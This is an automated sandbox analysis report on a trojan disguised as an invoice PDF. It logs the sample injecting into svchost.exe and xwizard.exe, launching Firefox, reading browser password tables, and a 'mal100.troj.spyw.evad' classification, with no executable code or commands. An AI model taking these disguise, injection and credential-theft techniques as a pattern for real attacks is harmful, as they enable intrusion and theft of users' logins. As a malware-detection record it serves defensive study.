                Source: Yara match File source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample Static PE information: Filename: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042CBA3 NtClose, 2_2_0042CBA3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772B60 NtClose, LdrInitializeThunk, 2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772DF0 NtQuerySystemInformation, LdrInitializeThunk, 2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037735C0 NtCreateMutant, LdrInitializeThunk, 2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03774340 NtSetContextThread, 2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03774650 NtSuspendThread, 2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772BF0 NtAllocateVirtualMemory, 2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772BE0 NtQueryValueKey, 2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772BA0 NtEnumerateValueKey, 2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772B80 NtQueryInformationFile, 2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772AF0 NtWriteFile, 2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772AD0 NtReadFile, 2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772AB0 NtWaitForSingleObject, 2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772F60 NtCreateProcessEx, 2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772F30 NtCreateSection, 2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772FE0 NtCreateFile, 2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772FB0 NtResumeThread, 2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772FA0 NtQuerySection, 2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772F90 NtProtectVirtualMemory, 2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772E30 NtWriteVirtualMemory, 2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772EE0 NtQueueApcThread, 2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772EA0 NtAdjustPrivilegesToken, 2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772E80 NtReadVirtualMemory, 2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772D30 NtUnmapViewOfSection, 2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772D10 NtMapViewOfSection, 2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772D00 NtSetInformationFile, 2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772DD0 NtDelayExecution, 2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772DB0 NtEnumerateKey, 2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772C70 NtFreeVirtualMemory, 2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772C60 NtCreateKey, 2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772C00 NtQueryInformationProcess, 2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772CF0 NtOpenProcess, 2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772CC0 NtQueryVirtualMemory, 2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03772CA0 NtQueryInformationToken, 2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773010 NtOpenDirectoryObject, 2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773090 NtSetValueKey, 2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037739B0 NtGetContextThread, 2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773D70 NtOpenThread, 2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03773D10 NtOpenProcessToken, 2_2_03773D10
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F34650 NtSuspendThread, LdrInitializeThunk, 5_2_04F34650
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F34340 NtSetContextThread, LdrInitializeThunk, 5_2_04F34340
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32CA0 NtQueryInformationToken, LdrInitializeThunk, 5_2_04F32CA0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32C70 NtFreeVirtualMemory, LdrInitializeThunk, 5_2_04F32C70
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32C60 NtCreateKey, LdrInitializeThunk, 5_2_04F32C60
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32DF0 NtQuerySystemInformation, LdrInitializeThunk, 5_2_04F32DF0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32DD0 NtDelayExecution, LdrInitializeThunk, 5_2_04F32DD0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32D30 NtUnmapViewOfSection, LdrInitializeThunk, 5_2_04F32D30
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32D10 NtMapViewOfSection, LdrInitializeThunk, 5_2_04F32D10
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32EE0 NtQueueApcThread, LdrInitializeThunk, 5_2_04F32EE0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32E80 NtReadVirtualMemory, LdrInitializeThunk, 5_2_04F32E80
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32FE0 NtCreateFile, LdrInitializeThunk, 5_2_04F32FE0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32FB0 NtResumeThread, LdrInitializeThunk, 5_2_04F32FB0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32F30 NtCreateSection, LdrInitializeThunk, 5_2_04F32F30
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32AF0 NtWriteFile, LdrInitializeThunk, 5_2_04F32AF0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32AD0 NtReadFile, LdrInitializeThunk, 5_2_04F32AD0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 5_2_04F32BF0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32BE0 NtQueryValueKey, LdrInitializeThunk, 5_2_04F32BE0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32BA0 NtEnumerateValueKey, LdrInitializeThunk, 5_2_04F32BA0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32B60 NtClose, LdrInitializeThunk, 5_2_04F32B60
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F335C0 NtCreateMutant, LdrInitializeThunk, 5_2_04F335C0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F339B0 NtGetContextThread, LdrInitializeThunk, 5_2_04F339B0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32CF0 NtOpenProcess, 5_2_04F32CF0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32CC0 NtQueryVirtualMemory, 5_2_04F32CC0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32C00 NtQueryInformationProcess, 5_2_04F32C00
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32DB0 NtEnumerateKey, 5_2_04F32DB0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32D00 NtSetInformationFile, 5_2_04F32D00
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32EA0 NtAdjustPrivilegesToken, 5_2_04F32EA0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32E30 NtWriteVirtualMemory, 5_2_04F32E30
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32FA0 NtQuerySection, 5_2_04F32FA0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32F90 NtProtectVirtualMemory, 5_2_04F32F90
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32F60 NtCreateProcessEx, 5_2_04F32F60
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32AB0 NtWaitForSingleObject, 5_2_04F32AB0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F32B80 NtQueryInformationFile, 5_2_04F32B80
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F33090 NtSetValueKey, 5_2_04F33090
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F33010 NtOpenDirectoryObject, 5_2_04F33010
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F33D70 NtOpenThread, 5_2_04F33D70
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04F33D10 NtOpenProcessToken, 5_2_04F33D10
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_030292D0 NtCreateFile, 5_2_030292D0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_03029720 NtAllocateVirtualMemory, 5_2_03029720
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_03029520 NtDeleteFile, 5_2_03029520
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_030295C0 NtClose, 5_2_030295C0
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_03029430 NtReadFile, 5_2_03029430
                Source: C:\Windows\SysWOW64\xwizard.exe Code function: 5_2_04DBF0A1 NtQueryInformationProcess, 5_2_04DBF0A1
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00434D50: GetFullPathNameW, __swprintf, _wcslen, _wcslen, _wcslen, CreateDirectoryW, CreateFileW, _memset, _wcslen, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle, 0_2_00434D50
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004461ED _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, _wcsncpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock, 0_2_004461ED
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004364AA GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, SetSystemPowerState, 0_2_004364AA
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FA0CB55_2_04FA0CB5
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F00C005_2_04F00C00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EFADE05_2_04EFADE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F18DBF5_2_04F18DBF
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9CD1F5_2_04F9CD1F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0AD005_2_04F0AD00
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBEEDB5_2_04FBEEDB
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F12E905_2_04F12E90
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBCE935_2_04FBCE93
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F00E595_2_04F00E59
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBEE265_2_04FBEE26
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0CFE05_2_04F0CFE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EF2FC85_2_04EF2FC8
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F7EFA05_2_04F7EFA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F74F405_2_04F74F40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F20F305_2_04F20F30
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F42F285_2_04F42F28
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F2E8F05_2_04F2E8F0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EE68B85_2_04EE68B8
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0A8405_2_04F0A840
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F028405_2_04F02840
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F029A05_2_04F029A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FCA9A65_2_04FCA9A6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F169625_2_04F16962
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EFEA805_2_04EFEA80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB6BD75_2_04FB6BD7
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBAB405_2_04FBAB40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EF14605_2_04EF1460
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBF43F5_2_04FBF43F
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9D5B05_2_04F9D5B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB75715_2_04FB7571
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB16CC5_2_04FB16CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBF7B05_2_04FBF7B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB70E95_2_04FB70E9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBF0E05_2_04FBF0E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F070C05_2_04F070C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FAF0CC5_2_04FAF0CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F0B1B05_2_04F0B1B0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FCB16B5_2_04FCB16B
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EEF1725_2_04EEF172
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F3516C5_2_04F3516C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FA12ED5_2_04FA12ED
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1B2C05_2_04F1B2C0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F052A05_2_04F052A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F4739A5_2_04F4739A
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04EED34C5_2_04EED34C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB132D5_2_04FB132D
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFCF25_2_04FBFCF2
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F79C325_2_04F79C32
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1FDC05_2_04F1FDC0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB7D735_2_04FB7D73
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB1D5A5_2_04FB1D5A
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F03D405_2_04F03D40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F09EB05_2_04F09EB0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFFB15_2_04FBFFB1
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F01F925_2_04F01F92
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFF095_2_04FBFF09
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F038E05_2_04F038E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F6D8005_2_04F6D800
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F099505_2_04F09950
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1B9505_2_04F1B950
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F959105_2_04F95910
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FADAC65_2_04FADAC6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F45AA05_2_04F45AA0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F9DAAC5_2_04F9DAAC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F73A6C5_2_04F73A6C
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFA495_2_04FBFA49
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FB7A465_2_04FB7A46
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F75BF05_2_04F75BF0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F3DBF95_2_04F3DBF9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04F1FB805_2_04F1FB80
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04FBFB765_2_04FBFB76
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030120005_2_03012000
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0300D1605_2_0300D160
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0300B1E05_2_0300B1E0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030156505_2_03015650
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0302BB705_2_0302BB70
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0301389B5_2_0301389B
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_030138A05_2_030138A0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_0300CF405_2_0300CF40
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBE6CC5_2_04DBE6CC
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBD7985_2_04DBD798
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBE2145_2_04DBE214
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBE3335_2_04DBE333
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 5_2_04DBCA445_2_04DBCA44
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 00445975 appears 65 times
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 0041171A appears 37 times
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 0041718C appears 45 times
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: String function: 0040E6D0 appears 35 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04EEB970 appears 275 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F7F290 appears 105 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F35130 appears 58 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F47E54 appears 101 times
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 04F6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039806550.000000000419D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2039190730.0000000003FF3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/11
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0044AF5C GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe File created: C:\Users\user\AppData\Local\Temp\aut285A.tmp
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003291000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.00000000032BE000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2528743375.0000000003270000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.000000000329A000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000003.2528865334.0000000003291000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe ReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe File read: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                Source: unknown Process created: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
                Source: C:\Windows\SysWOW64\xwizard.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Section loaded: ntmarta.dll
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\xwizard.exe Section loaded: wininet.dll
